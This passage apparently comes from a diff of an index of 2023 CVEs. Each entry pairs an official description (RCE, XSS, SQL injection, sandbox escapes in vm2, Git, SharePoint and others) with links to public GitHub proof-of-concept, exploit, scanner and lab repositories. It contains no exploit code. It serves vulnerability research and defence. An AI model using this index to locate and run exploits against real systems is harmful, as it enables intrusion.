with that submodule. When the attacker injects configuration values which specify executables to run (such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to a remote code execution. A fix A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid running `git submodule deinit` on untrusted repositories or without prior inspection of any submodule sections in `$GIT_DIR/config`. + + +- [ethiack/CVE-2023-29007](https://github.com/ethiack/CVE-2023-29007) +- [omespino/CVE-2023-29007](https://github.com/omespino/CVE-2023-29007) +- [x-Defender/CVE-2023-29007_win-version](https://github.com/x-Defender/CVE-2023-29007_win-version) + +### CVE-2023-29017 (2023-04-06) + +vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Prior to version 3.9.15, vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors. A threat actor could bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.15 of vm2. There are no known workarounds. + + +- [timb-machine-mirrors/seongil-wi-CVE-2023-29017](https://github.com/timb-machine-mirrors/seongil-wi-CVE-2023-29017) +- [passwa11/CVE-2023-29017-reverse-shell](https://github.com/passwa11/CVE-2023-29017-reverse-shell) + +### CVE-2023-29084 (2023-04-13) + +Zoho ManageEngine ADManager Plus before 7181 allows for authenticated users to exploit command injection via Proxy settings. + + +- [ohnonoyesyes/CVE-2023-29084](https://github.com/ohnonoyesyes/CVE-2023-29084) + +### CVE-2023-29324 (2023-05-09) + +Windows MSHTML Platform Security Feature Bypass Vulnerability + + +- [OLeDouxEt/CVE-2023-29324_Patch_Deploy](https://github.com/OLeDouxEt/CVE-2023-29324_Patch_Deploy) + +### CVE-2023-29336 (2023-05-09) + +Win32k Elevation of Privilege Vulnerability + + +- [m-cetin/CVE-2023-29336](https://github.com/m-cetin/CVE-2023-29336) + +### CVE-2023-29343 (2023-05-09) + +SysInternals Sysmon for Windows Elevation of Privilege Vulnerability + + +- [Wh04m1001/CVE-2023-29343](https://github.com/Wh04m1001/CVE-2023-29343) + +### CVE-2023-29357 (2023-06-13) + +Microsoft SharePoint Server Elevation of Privilege Vulnerability + + +- [Chocapikk/CVE-2023-29357](https://github.com/Chocapikk/CVE-2023-29357) +- [LuemmelSec/CVE-2023-29357](https://github.com/LuemmelSec/CVE-2023-29357) +- [KeyStrOke95/CVE-2023-29357-ExE](https://github.com/KeyStrOke95/CVE-2023-29357-ExE) +- [Guillaume-Risch/cve-2023-29357-Sharepoint](https://github.com/Guillaume-Risch/cve-2023-29357-Sharepoint) +- [Jev1337/CVE-2023-29357-Check](https://github.com/Jev1337/CVE-2023-29357-Check) +- [AhmedMansour93/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357](https://github.com/AhmedMansour93/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357) + +### CVE-2023-29360 (2023-06-13) + +Microsoft Streaming Service Elevation of Privilege Vulnerability + + +- [Nero22k/cve-2023-29360](https://github.com/Nero22k/cve-2023-29360) +- [0xDivyanshu-new/CVE-2023-29360](https://github.com/0xDivyanshu-new/CVE-2023-29360) + +### CVE-2023-29384 (2023-12-20) + +Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP.This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.0.\n\n + + +- [nastar-id/CVE-2023-29384](https://github.com/nastar-id/CVE-2023-29384) + +### CVE-2023-29406 (2023-07-11) + +The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value. + + +- [LuizGustavoP/EP3_Redes](https://github.com/LuizGustavoP/EP3_Redes) + +### CVE-2023-29409 (2023-08-02) + +Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures. With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits. Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable. + + +- [mateusz834/CVE-2023-29409](https://github.com/mateusz834/CVE-2023-29409) + +### CVE-2023-29439 (2023-05-16) + +Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions. + + +- [LOURC0D3/CVE-2023-29439](https://github.com/LOURC0D3/CVE-2023-29439) + +### CVE-2023-29478 (2023-04-07) + +BiblioCraft before 2.4.6 does not sanitize path-traversal characters in filenames, allowing restricted write access to almost anywhere on the filesystem. This includes the Minecraft mods folder, which results in code execution. + + +- [Exopteron/BiblioRCE](https://github.com/Exopteron/BiblioRCE) + +### CVE-2023-29489 (2023-04-27) + +An issue was discovered in cPanel before 11.109.9999.116. XSS can occur on the cpsrvd error page via an invalid webcall ID, aka SEC-669. The fixed versions are 11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31. + + +- [learnerboy88/CVE-2023-29489](https://github.com/learnerboy88/CVE-2023-29489) +- [xKore123/cPanel-CVE-2023-29489](https://github.com/xKore123/cPanel-CVE-2023-29489) +- [ipk1/CVE-2023-29489.py](https://github.com/ipk1/CVE-2023-29489.py) +- [Mostafa-Elguerdawi/CVE-2023-29489.yaml](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489.yaml) +- [Mostafa-Elguerdawi/CVE-2023-29489](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489) +- [whalebone7/EagleEye](https://github.com/whalebone7/EagleEye) +- [0-d3y/CVE-2023-29489](https://github.com/0-d3y/CVE-2023-29489) +- [Abdullah7-ma/CVE-2023-29489](https://github.com/Abdullah7-ma/CVE-2023-29489) +- [tucommenceapousser/CVE-2023-29489](https://github.com/tucommenceapousser/CVE-2023-29489) +- [tucommenceapousser/CVE-2023-29489.py](https://github.com/tucommenceapousser/CVE-2023-29489.py) +- [ViperM4sk/cpanel-xss-177](https://github.com/ViperM4sk/cpanel-xss-177) +- [S4muraiMelayu1337/CVE-2023-29489](https://github.com/S4muraiMelayu1337/CVE-2023-29489) +- [SynixCyberCrimeMy/CVE-2023-29489](https://github.com/SynixCyberCrimeMy/CVE-2023-29489) +- [Makurorororororororo/Validate-CVE-2023-29489-scanner-](https://github.com/Makurorororororororo/Validate-CVE-2023-29489-scanner-) +- [prasad-1808/tool-29489](https://github.com/prasad-1808/tool-29489) +- [mdaseem03/cpanel_xss_2023](https://github.com/mdaseem03/cpanel_xss_2023) +- [some-man1/CVE-2023-29489](https://github.com/some-man1/CVE-2023-29489) +- [Cappricio-Securities/CVE-2023-29489](https://github.com/Cappricio-Securities/CVE-2023-29489) +- [md-thalal/CVE-2023-29489](https://github.com/md-thalal/CVE-2023-29489) + +### CVE-2023-29808 (2023-05-12) + +Cross Site Scripting (XSS) vulnerability in vogtmh cmaps (companymaps) 8.0 allows attackers to execute arbitrary code. + + +- [zPrototype/CVE-2023-29808](https://github.com/zPrototype/CVE-2023-29808) + +### CVE-2023-29809 (2023-05-12) + +SQL injection vulnerability found in Maximilian Vogt companymaps (cmaps) v.8.0 allows a remote attacker to execute arbitrary code via a crafted script in the request. + + +- [zPrototype/CVE-2023-29809](https://github.com/zPrototype/CVE-2023-29809) + +### CVE-2023-29839 (2023-05-03) + +A Stored Cross Site Scripting (XSS) vulnerability exists in multiple pages of Hotel Druid version 3.0.4, which allows arbitrary execution of commands. The vulnerable fields are Surname, Name, and Nickname in the Document function. + + +- [jichngan/CVE-2023-29839](https://github.com/jichngan/CVE-2023-29839) + +### CVE-2023-29919 (2023-05-23) + +SolarView Compact <= 6.0 is vulnerable to Insecure Permissions. Any file on the server can be read or modified because texteditor.php is not restricted. + + +- [xiaosed/CVE-2023-29919](https://github.com/xiaosed/CVE-2023-29919) + +### CVE-2023-29922 (2023-04-19) + +PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface. + + +- [CN016/Powerjob-CVE-2023-29922-](https://github.com/CN016/Powerjob-CVE-2023-29922-) + +### CVE-2023-29923 (2023-04-19) + +PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface. + + +- [1820112015/CVE-2023-29923](https://github.com/1820112015/CVE-2023-29923) +- [3yujw7njai/CVE-2023-29923-Scan](https://github.com/3yujw7njai/CVE-2023-29923-Scan) +- [Le1a/CVE-2023-29923](https://github.com/Le1a/CVE-2023-29923) + +### CVE-2023-29929 (2024-08-21) + +Buffer Overflow vulnerability found in Kemptechnologies Loadmaster before v.7.2.60.0 allows a remote attacker to casue a denial of service via the libkemplink.so, isreverse library. + + +- [YSaxon/CVE-2023-29929](https://github.com/YSaxon/CVE-2023-29929) + +### CVE-2023-29930 (2023-05-10) + +An issue was found in Genesys CIC Polycom phone provisioning TFTP Server all version allows a remote attacker to execute arbitrary code via the login crednetials to the TFTP server configuration page. + + +- [YSaxon/TFTPlunder](https://github.com/YSaxon/TFTPlunder) + +### CVE-2023-29983 (2023-05-12) + +Cross Site Scripting vulnerability found in Maximilian Vogt cmaps v.8.0 allows a remote attacker to execute arbitrary code via the auditlog tab in the admin panel. + + +- [zPrototype/CVE-2023-29983](https://github.com/zPrototype/CVE-2023-29983) + +### CVE-2023-30033 +- [phucodeexp/CVE-2023-30033](https://github.com/phucodeexp/CVE-2023-30033) + +### CVE-2023-30092 (2023-05-08) + +SourceCodester Online Pizza Ordering System v1.0 is vulnerable to SQL Injection via the QTY parameter. + + +- [nawed20002/CVE-2023-30092](https://github.com/nawed20002/CVE-2023-30092) + +### CVE-2023-30145 (2023-05-26) + +Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the formats parameter. + + +- [paragbagul111/CVE-2023-30145](https://github.com/paragbagul111/CVE-2023-30145) + +### CVE-2023-30146 (2023-08-04) + +Assmann Digitus Plug&View IP Camera HT-IP211HDP, version 2.000.022 allows unauthenticated attackers to download a copy of the camera's settings and the administrator credentials. + + +- [L1-0/CVE-2023-30146](https://github.com/L1-0/CVE-2023-30146) + +### CVE-2023-30185 (2023-05-08) + +CRMEB v4.4 to v4.6 was discovered to contain an arbitrary file upload vulnerability via the component \attachment\SystemAttachmentServices.php. + + +- [c7w1n/CVE-2023-30185](https://github.com/c7w1n/CVE-2023-30185) + +### CVE-2023-30190 +- [MojithaR/CVE-2023-30190-FOLLINA](https://github.com/MojithaR/CVE-2023-30190-FOLLINA) + +### CVE-2023-30212 (2023-04-26) + +OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php. + + +- [kuttappu123/CVE-2023-30212-LAB](https://github.com/kuttappu123/CVE-2023-30212-LAB) +- [Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE](https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE) +- [mallutrojan/CVE-2023-30212-Lab](https://github.com/mallutrojan/CVE-2023-30212-Lab) +- [Anandhu990/CVE-2023-30212_lab](https://github.com/Anandhu990/CVE-2023-30212_lab) +- [libas7994/CVE-2023-30212](https://github.com/libas7994/CVE-2023-30212) +- [libasmon/Vulnerable-Docker-Environment-CVE-2023-30212](https://github.com/libasmon/Vulnerable-Docker-Environment-CVE-2023-30212) +- [libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212](https://github.com/libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212) +- [libasmon/Exploite-CVE-2023-30212-Vulnerability](https://github.com/libasmon/Exploite-CVE-2023-30212-Vulnerability) +- [libas7994/Exploit-the-CVE-2023-30212-vulnerability](https://github.com/libas7994/Exploit-the-CVE-2023-30212-vulnerability) +- [libasv/Exploite-CVE-2023-30212-vulnerability](https://github.com/libasv/Exploite-CVE-2023-30212-vulnerability) +- [kai-iszz/CVE-2023-30212](https://github.com/kai-iszz/CVE-2023-30212) +- [MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability](https://github.com/MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability) +- [arunsnap/CVE-2023-30212-POC](https://github.com/arunsnap/CVE-2023-30212-POC) +- [VisDev23/Vulnerable-Docker--CVE-2023-30212-](https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-) +- [AAsh035/CVE-2023-30212](https://github.com/AAsh035/CVE-2023-30212) +- [JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-](https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-) + +### CVE-2023-30226 (2023-07-12) + +An issue was discovered in function get_gnu_verneed in rizinorg Rizin prior to 0.5.0 verneed_entry allows attackers to cause a denial of service via crafted elf file. + + +- [ifyGecko/CVE-2023-30226](https://github.com/ifyGecko/CVE-2023-30226) + +### CVE-2023-30253 (2023-05-29) + +Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data. + + +- [Rubikcuv5/cve-2023-30253](https://github.com/Rubikcuv5/cve-2023-30253) +- [04Shivam/CVE-2023-30253-Exploit](https://github.com/04Shivam/CVE-2023-30253-Exploit) +- [nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253) +- [g4nkd/CVE-2023-30253-PoC](https://github.com/g4nkd/CVE-2023-30253-PoC) +- [dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253](https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253) +- [andria-dev/DolibabyPhp](https://github.com/andria-dev/DolibabyPhp) +- [bluetoothStrawberry/CVE-2023-30253](https://github.com/bluetoothStrawberry/CVE-2023-30253) + +### CVE-2023-30256 (2023-05-11) + +Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file. + + +- [ahrixia/CVE-2023-30256](https://github.com/ahrixia/CVE-2023-30256) + +### CVE-2023-30258 (2023-06-23) + +Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request. + + +- [gy741/CVE-2023-30258-setup](https://github.com/gy741/CVE-2023-30258-setup) + +### CVE-2023-30347 (2023-06-22) + +Cross Site Scripting (XSS) vulnerability in Neox Contact Center 2.3.9, via the serach_sms_api_name parameter to the SMA API search. + + +- [huzefa2212/CVE-2023-30347](https://github.com/huzefa2212/CVE-2023-30347) + +### CVE-2023-30367 (2023-07-26) + +Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory. + + +- [S1lkys/CVE-2023-30367-mRemoteNG-password-dumper](https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper) + +### CVE-2023-30383 (2023-07-18) + +TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data. + + +- [a2ure123/CVE-2023-30383](https://github.com/a2ure123/CVE-2023-30383) + +### CVE-2023-30458 (2023-04-24) + +A username enumeration issue was discovered in Medicine Tracker System 1.0. The login functionality allows a malicious user to guess a valid username due to a different response time from invalid usernames. When one enters a valid username, the response time increases depending on the length of the supplied password. + + +- [d34dun1c02n/CVE-2023-30458](https://github.com/d34dun1c02n/CVE-2023-30458) + +### CVE-2023-30459 (2023-04-14) + +SmartPTT SCADA 1.1.0.0 allows remote code execution (when the attacker has administrator privileges) by writing a malicious C# script and executing it on the server (via server settings in the administrator control panel on port 8101, by default). + + +- [Toxich4/CVE-2023-30459](https://github.com/Toxich4/CVE-2023-30459) + +### CVE-2023-30486 +- [RandomRobbieBF/CVE-2023-30486](https://github.com/RandomRobbieBF/CVE-2023-30486) + +### CVE-2023-30533 (2023-04-24) + +SheetJS Community Edition before 0.19.3 allows Prototype Pollution via a crafted file. In other words. 0.19.2 and earlier are affected, whereas 0.19.3 and later are unaffected. + + +- [BenEdridge/CVE-2023-30533](https://github.com/BenEdridge/CVE-2023-30533) + +### CVE-2023-30547 (2023-04-17) + +vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context. This vulnerability was patched in the release of version `3.9.17` of `vm2`. There are no known workarounds for this vulnerability. Users are advised to upgrade. + + +- [rvizx/CVE-2023-30547](https://github.com/rvizx/CVE-2023-30547) +- [user0x1337/CVE-2023-30547](https://github.com/user0x1337/CVE-2023-30547) +- [Cur1iosity/CVE-2023-30547](https://github.com/Cur1iosity/CVE-2023-30547) +- [junnythemarksman/CVE-2023-30547](https://github.com/junnythemarksman/CVE-2023-30547) + +### CVE-2023-30765 (2023-07-10) + +\n​Delta Electronics InfraSuite Device Master versions prior to 1.0.7 contain improper access controls that could allow an attacker to alter privilege management configurations, resulting in privilege escalation.\n\n + + +- [0xfml/CVE-2023-30765](https://github.com/0xfml/CVE-2023-30765) + +### CVE-2023-30777 (2023-05-10) + +Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WP Engine Advanced Custom Fields Pro, WP Engine Advanced Custom Fields plugins <= 6.1.5 versions. + + +- [Alucard0x1/CVE-2023-30777](https://github.com/Alucard0x1/CVE-2023-30777) + +### CVE-2023-30800 (2023-09-07) + +The web server used by MikroTik RouterOS version 6 is affected by a heap memory corruption issue. A remote and unauthenticated attacker can corrupt the server's heap memory by sending a crafted HTTP request. As a result, the web interface crashes and is immediately restarted. The issue was fixed in RouterOS 6.49.10 stable. RouterOS version 7 is not affected.\n + + +- [griffinsectio/CVE-2023-30800_PoC](https://github.com/griffinsectio/CVE-2023-30800_PoC) +- [griffinsectio/CVE-2023-30800_PoC_go](https://github.com/griffinsectio/CVE-2023-30800_PoC_go) +- [KhogenTheRabbit/cve-2023-30800-multithread-doser](https://github.com/KhogenTheRabbit/cve-2023-30800-multithread-doser) +- [AxthonyV/MikroTik](https://github.com/AxthonyV/MikroTik) + +### CVE-2023-30839 (2023-04-25) + +PrestaShop is an Open Source e-commerce web application. Versions prior to 8.0.4 and 1.7.8.9 contain a SQL filtering vulnerability. A BO user can write, update, and delete in the database, even without having specific rights. PrestaShop 8.0.4 and 1.7.8.9 contain a patch for this issue. There are no known workarounds. + + +- [drkbcn/lblfixer_cve_2023_30839](https://github.com/drkbcn/lblfixer_cve_2023_30839) + +### CVE-2023-30845 (2023-04-26) + +ESPv2 is a service proxy that provides API management capabilities using Google Service Infrastructure. ESPv2 2.20.0 through 2.42.0 contains an authentication bypass vulnerability. API clients can craft a malicious `X-HTTP-Method-Override` header value to bypass JWT authentication in specific cases.\n\nESPv2 allows malicious requests to bypass authentication if both the conditions are true: The requested HTTP method is **not** in the API service definition (OpenAPI spec or gRPC `google.api.http` proto annotations, and the specified `X-HTTP-Method-Override` is a valid HTTP method in the API service definition. ESPv2 will forward the request to your backend without checking the JWT. Attackers can craft requests with a malicious `X-HTTP-Method-Override` value that allows them to bypass specifying JWTs. Restricting API access with API keys works as intended and is not affected by this vulnerability.\n\nUpgrade deployments to release v2.43.0 or higher to receive a patch. This release ensures that JWT authentication occurs, even when the caller specifies `x-http-method-override`. `x-http-method-override` is still supported by v2.43.0+. API clients can continue sending this header to ESPv2. + + +- [himori123/-CVE-2023-30845](https://github.com/himori123/-CVE-2023-30845) + +### CVE-2023-30854 (2023-04-28) + +AVideo is an open source video platform. Prior to version 12.4, an OS Command Injection vulnerability in an authenticated endpoint `/plugin/CloneSite/cloneClient.json.php` allows attackers to achieve Remote Code Execution. This issue is fixed in version 12.4. + + +- [jmrcsnchz/CVE-2023-30854](https://github.com/jmrcsnchz/CVE-2023-30854) + +### CVE-2023-30943 (2023-05-02) + +The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. + + +- [d0rb/CVE-2023-30943](https://github.com/d0rb/CVE-2023-30943) +- [Chocapikk/CVE-2023-30943](https://github.com/Chocapikk/CVE-2023-30943) +- [RubyCat1337/CVE-2023-30943](https://github.com/RubyCat1337/CVE-2023-30943) + +### CVE-2023-31070 +- [bugprove/cve-2023-31070](https://github.com/bugprove/cve-2023-31070) + +### CVE-2023-31290 (2023-04-27) + +Trust Wallet Core before 3.1.1, as used in the Trust Wallet browser extension before 0.0.183, allows theft of funds because the entropy is 32 bits, as exploited in the wild in December 2022 and March 2023. This occurs because the mt19937 Mersenne Twister takes a single 32-bit value as an input seed, resulting in only four billion possible mnemonics. The affected versions of the browser extension are 0.0.172 through 0.0.182. To steal funds efficiently, an attacker can identify all Ethereum addresses created since the 0.0.172 release, and check whether they are Ethereum addresses that could have been created by this extension. To respond to the risk, affected users need to upgrade the product version and also move funds to a new wallet address. + + +- [ohexa/py_trustwallet_wasm](https://github.com/ohexa/py_trustwallet_wasm) + +### CVE-2023-31320 (2023-11-14) + +Improper input validation in the AMD RadeonTM Graphics display driver may allow an attacker to corrupt the display potentially resulting in denial of service.\n\n\n\n\n\n\n\n\n\n\n\n\n + + +- [whypet/CVE-2023-31320](https://github.com/whypet/CVE-2023-31320) + +### CVE-2023-31346 (2024-02-13) + +Failure to initialize\nmemory in SEV Firmware may allow a privileged attacker to access stale data\nfrom other guests.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n + + +- [Freax13/cve-2023-31346-poc](https://github.com/Freax13/cve-2023-31346-poc) + +### CVE-2023-31355 (2024-08-05) + +Improper restriction of write operations in SNP firmware could allow a malicious hypervisor to overwrite a guest's UMC seed potentially allowing reading of memory from a decommissioned guest. + + +- [Freax13/cve-2023-31355-poc](https://github.com/Freax13/cve-2023-31355-poc) + +### CVE-2023-31419 (2023-10-26) + +A flaw was discovered in Elasticsearch, affecting the _search API that allowed a specially crafted query string to cause a Stack Overflow and ultimately a Denial of Service.\n\n\n\n\n + + +- [sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419](https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419) +- [u238/Elasticsearch-CVE-2023-31419](https://github.com/u238/Elasticsearch-CVE-2023-31419) + +### CVE-2023-31433 (2023-05-02) + +A SQL injection issue in Logbuch in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allows authenticated attackers to execute SQL statements via the welche parameter. + + +- [trustcves/CVE-2023-31433](https://github.com/trustcves/CVE-2023-31433) + +### CVE-2023-31434 (2023-05-02) + +The parameters nutzer_titel, nutzer_vn, and nutzer_nn in the user profile, and langID and ONLINEID in direct links, in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 do not validate input, which allows authenticated attackers to inject HTML Code and XSS payloads in multiple locations. + + +- [trustcves/CVE-2023-31434](https://github.com/trustcves/CVE-2023-31434) + +### CVE-2023-31435 (2023-05-02) + +Multiple components (such as Onlinetemplate-Verwaltung, Liste aller Teilbereiche, Umfragen anzeigen, and questionnaire previews) in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allow authenticated attackers to read and write to unauthorized data by accessing functions directly. + + +- [trustcves/CVE-2023-31435](https://github.com/trustcves/CVE-2023-31435) + +### CVE-2023-31443 +- [MaherAzzouzi/CVE-2023-31443](https://github.com/MaherAzzouzi/CVE-2023-31443) + +### CVE-2023-31445 (2023-05-11) + +Cassia Access controller before 2.1.1.2203171453, was discovered to have a unprivileged -information disclosure vulnerability that allows read-only users have the ability to enumerate all other users and discover e-mail addresses, phone numbers, and privileges of all other users. + + +- [Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure](https://github.com/Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure) + +### CVE-2023-31446 (2024-01-10) + +In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup. + + +- [Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution](https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution) + +### CVE-2023-31497 (2023-05-11) + +Incorrect access control in Quick Heal Technologies Limited Seqrite Endpoint Security (EPS) all versions prior to v8.0 allows attackers to escalate privileges to root via supplying a crafted binary to the target system. + + +- [0xInfection/EPScalate](https://github.com/0xInfection/EPScalate) + +### CVE-2023-31541 (2023-06-13) + +A unrestricted file upload vulnerability was discovered in the ‘Browse and upload images’ feature of the CKEditor v1.2.3 plugin for Redmine, which allows arbitrary files to be uploaded to the server. + + +- [DreamD2v/CVE-2023-31541](https://github.com/DreamD2v/CVE-2023-31541) + +### CVE-2023-31546 (2023-12-14) + +Cross Site Scripting (XSS) vulnerability in DedeBIZ v6.0.3 allows attackers to run arbitrary code via the search feature. + + +- [ran9ege/CVE-2023-31546](https://github.com/ran9ege/CVE-2023-31546) + +### CVE-2023-31584 (2023-05-22) + +GitHub repository cu/silicon commit a9ef36 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the User Input field. + + +- [rootd4ddy/CVE-2023-31584](https://github.com/rootd4ddy/CVE-2023-31584) + +### CVE-2023-31594 (2023-05-25) + +IC Realtime ICIP-P2012T 2.420 is vulnerable to Incorrect Access Control via an exposed HTTP channel using VLC network. + + +- [Yozarseef95/CVE-2023-31594](https://github.com/Yozarseef95/CVE-2023-31594) + +### CVE-2023-31595 (2023-05-24) + +IC Realtime ICIP-P2012T 2.420 is vulnerable to Incorrect Access Control via unauthenticated port access. + + +- [Yozarseef95/CVE-2023-31595](https://github.com/Yozarseef95/CVE-2023-31595) + +### CVE-2023-31606 (2023-06-06) + +A Regular Expression Denial of Service (ReDoS) issue was discovered in the sanitize_html function of redcloth gem v4.0.0. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload. + + +- [merbinr/CVE-2023-31606](https://github.com/merbinr/CVE-2023-31606) + +### CVE-2023-31634 (2024-03-27) + +In TeslaMate before 1.27.2, there is unauthorized access to port 4000 for remote viewing and operation of user data. After accessing the IP address for the TeslaMate instance, an attacker can switch the port to 3000 to enter Grafana for remote operations. At that time, the default username and password can be used to enter the Grafana management console without logging in, a related issue to CVE-2022-23126. + + +- [iSee857/CVE-2023-31634](https://github.com/iSee857/CVE-2023-31634) + +### CVE-2023-31664 (2023-05-23) + +A reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 API Manager before 4.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tenantDomain parameter. + + +- [adilkhan7/CVE-2023-31664](https://github.com/adilkhan7/CVE-2023-31664) + +### CVE-2023-31702 (2023-05-17) + +SQL injection in the View User Profile in MicroWorld eScan Management Console 14.0.1400.2281 allows remote attacker to dump entire database and gain windows XP command shell to perform code execution on database server via GetUserCurrentPwd?UsrId=1. + + +- [sahiloj/CVE-2023-31702](https://github.com/sahiloj/CVE-2023-31702) + +### CVE-2023-31703 (2023-05-17) + +Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the from parameter. + + +- [sahiloj/CVE-2023-31703](https://github.com/sahiloj/CVE-2023-31703) + +### CVE-2023-31704 (2023-07-13) + +Sourcecodester Online Computer and Laptop Store 1.0 is vulnerable to Incorrect Access Control, which allows remote attackers to elevate privileges to the administrator's role. + + +- [d34dun1c02n/CVE-2023-31704](https://github.com/d34dun1c02n/CVE-2023-31704) + +### CVE-2023-31705 (2023-07-13) + +A Reflected Cross-site scripting (XSS) vulnerability in Sourcecodester Task Reminder System 1.0 allows an authenticated user to inject malicious javascript into the page parameter. + + +- [d34dun1c02n/CVE-2023-31705](https://github.com/d34dun1c02n/CVE-2023-31705) + +### CVE-2023-31711 +- [HritikThapa7/CVE-2023-31711](https://github.com/HritikThapa7/CVE-2023-31711) + +### CVE-2023-31714 (2023-08-30) + +Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities. + + +- [msd0pe-1/CVE-2023-31714](https://github.com/msd0pe-1/CVE-2023-31714) + +### CVE-2023-31716 (2023-09-21) + +FUXA <= 1.1.12 has a Local File Inclusion vulnerability via file=fuxa.log + + +- [MateusTesser/CVE-2023-31716](https://github.com/MateusTesser/CVE-2023-31716) + +### CVE-2023-31717 (2023-09-21) + +A SQL Injection attack in FUXA <= 1.1.12 allows exfiltration of confidential information from the database. + + +- [MateusTesser/CVE-2023-31717](https://github.com/MateusTesser/CVE-2023-31717) + +### CVE-2023-31718 (2023-09-21) + +FUXA <= 1.1.12 is vulnerable to Local via Inclusion via /api/download. + + +- [MateusTesser/CVE-2023-31718](https://github.com/MateusTesser/CVE-2023-31718) + +### CVE-2023-31719 (2023-09-21) + +FUXA <= 1.1.12 is vulnerable to SQL Injection via /api/signin. + + +- [MateusTesser/CVE-2023-31719](https://github.com/MateusTesser/CVE-2023-31719) + +### CVE-2023-31726 (2023-05-23) + +AList 3.15.1 is vulnerable to Incorrect Access Control, which can be exploited by attackers to obtain sensitive information. + + +- [J6451/CVE-2023-31726](https://github.com/J6451/CVE-2023-31726) + +### CVE-2023-31747 (2023-05-23) + 